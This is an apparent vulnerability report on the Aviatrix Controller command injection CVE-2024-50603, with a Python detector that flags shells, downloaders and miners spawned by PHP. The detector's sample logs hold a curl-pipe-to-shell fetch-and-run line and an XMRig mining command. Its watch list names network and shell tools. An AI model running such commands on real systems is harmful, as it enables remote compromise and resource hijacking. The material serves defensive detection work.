Full Report
The vulnerability CVE-2024-50603 was disclosed on 2025-01-07, with a detailed blog post and proof-of-concept exploit released by researchers soon after. Evidence of exploitation in cloud environments was observed by Wiz Research, targeting publicly exposed, vulnerable machines. At...
Analysis Summary
# Vulnerability: Aviatrix Controller Command Injection (CVE-2024-50603)
## CVE Details
- CVE ID: CVE-2024-50603
- CVSS Score: Not provided in text, but exploitation strongly implies **High/Critical**.
- CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))
## Affected Systems
- Products: Aviatrix Controller
- Versions: Specific vulnerable versions are not listed in the provided text.
- Configurations: Vulnerable to exploitation when exposed publicly to the internet.
## Vulnerability Description
The vulnerability is an **OS Command Injection** flaw existing in the Aviatrix Controller's API, specifically within the `list_flightpath_destination_instances` and `flightpath_connection_test` endpoints. Improper handling and lack of sanitization of user-supplied parameters such as `cloud_type` and `src_cloud_type` allow an unauthenticated remote attacker to inject and execute arbitrary operating system commands on the underlying controller host.
## Exploitation
- Status: **Exploited in the wild** (Observed by Wiz Research targeting publicly exposed machines).
- Complexity: **Low** (Unauthenticated, remote execution).
- Attack Vector: **Network**
## Impact
- Confidentiality: Potentially compromised (Evidence of backdoor deployment suggests access to configuration/data for exfiltration).
- Integrity: High (Arbitrary command execution allows full system compromise).
- Availability: Risk of degradation/denial due to resource hijacking (Cryptocurrency mining observed).
## Remediation
### Patches
- No specific patch version is mentioned in the provided text. Users must consult the official Aviatrix security advisory released shortly after CVE disclosure (2025-01-07).
### Workarounds
- **Restrict network access:** Immediately limit or block all public internet access to the Aviatrix Controller administration interfaces. Access should be restricted to trusted internal or management networks only.
## Detection
- **Indicators of Compromise (IOCs):**
  - Unauthorized execution of cryptocurrency mining software (e.g., XMRig) on the controller host.
  - Presence of suspicious persistence mechanisms, such as the Sliver C2 framework implant.
- **Detection Methods and Tools:**
  - Monitor controller system logs for unexpected process creation stemming from known API handler execution paths that involve command building (e.g., PHP processes spawning shells or system utilities such as `curl`, `wget`, or miners).
  - Network monitoring for outbound connections to known C2 infrastructure or cryptocurrency mining pools originating from the controller.
  - Use of vulnerability scanning tools (e.g., Nuclei) that may have published templates targeting this specific vulnerability signature.
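The process-lineage check described above, as an added example that is not part of the original report or of any Aviatrix tooling: it reads constructed process-creation log lines (the `ppid=/pcomm=/pid=/comm=/cmd=` format is an assumption, not a real Aviatrix log format) and flags shells, downloaders and miners that descend from a PHP or web-server process, walking the parent chain so a `curl` launched by a shell that PHP spawned is caught too.

```python
import re
# Constructed sample process-creation events (not taken from the page or a real host).
# Assumed format: "<ts> <host> ppid=<n> pcomm=<parent> pid=<n> comm=<child> cmd=<argv>"
SAMPLE_LOGS = """\
2025-01-08T10:01:02Z ctrl ppid=1200 pcomm=php-fpm pid=1301 comm=php cmd=php /var/www/index.php
2025-01-08T10:01:05Z ctrl ppid=1301 pcomm=php pid=1302 comm=sh cmd=sh -c "curl -s http://192.0.2.10/x.sh | sh"
2025-01-08T10:01:06Z ctrl ppid=1302 pcomm=sh pid=1303 comm=curl cmd=curl -s http://192.0.2.10/x.sh
2025-01-08T10:01:20Z ctrl ppid=1 pcomm=systemd pid=1400 comm=sshd cmd=/usr/sbin/sshd -D
2025-01-08T10:02:00Z ctrl ppid=1301 pcomm=php pid=1500 comm=xmrig cmd=./xmrig -o pool.example:3333
2025-01-08T10:02:30Z ctrl ppid=900 pcomm=cron pid=1600 comm=wget cmd=wget -q https://updates.example/list
"""

LINE_RE = re.compile(r"ppid=(\d+) pcomm=(\S+) pid=(\d+) comm=(\S+) cmd=(.*)$")
# Web/PHP parents that should never spawn the children below on a controller host.
WEB_PARENTS = {"php", "php-fpm", "php-cgi", "apache2", "httpd", "nginx"}
SUSPECT_CHILDREN = {"sh", "bash", "dash", "curl", "wget", "xmrig", "nc", "perl"}

def parse(text):
    """Turn log text into event dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            ppid, pcomm, pid, comm, cmd = m.groups()
            events.append({"ppid": int(ppid), "pcomm": pcomm,
                           "pid": int(pid), "comm": comm, "cmd": cmd})
    return events

def has_web_ancestor(event, by_pid, max_depth=8):
    """Walk up the parent chain (as far as the log records it) looking for a web/PHP parent."""
    pid = event["ppid"]
    for _ in range(max_depth):
        parent = by_pid.get(pid)
        if parent is None:
            return False
        if parent["comm"] in WEB_PARENTS:
            return True
        pid = parent["ppid"]
    return False

def find_suspicious(text):
    """Return (pid, comm, cmd) for suspect children descended from a web/PHP process."""
    events = parse(text)
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if e["comm"] in SUSPECT_CHILDREN and (
                e["pcomm"] in WEB_PARENTS or has_web_ancestor(e, by_pid)):
            hits.append((e["pid"], e["comm"], e["cmd"]))
    return hits
```

On the constructed sample this flags the `sh`, `curl` and `xmrig` events under PHP while leaving the `cron`-launched `wget` and `systemd`-launched `sshd` alone; a grandchild is caught only when its parent's own creation event is present in the log window.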
## References
- Vendor advisories: Consult official Aviatrix security documentation published around January 2025 regarding CVE-2024-50603.
- Relevant links (defanged):
  - hxxps://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/
  - hxxps://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-50603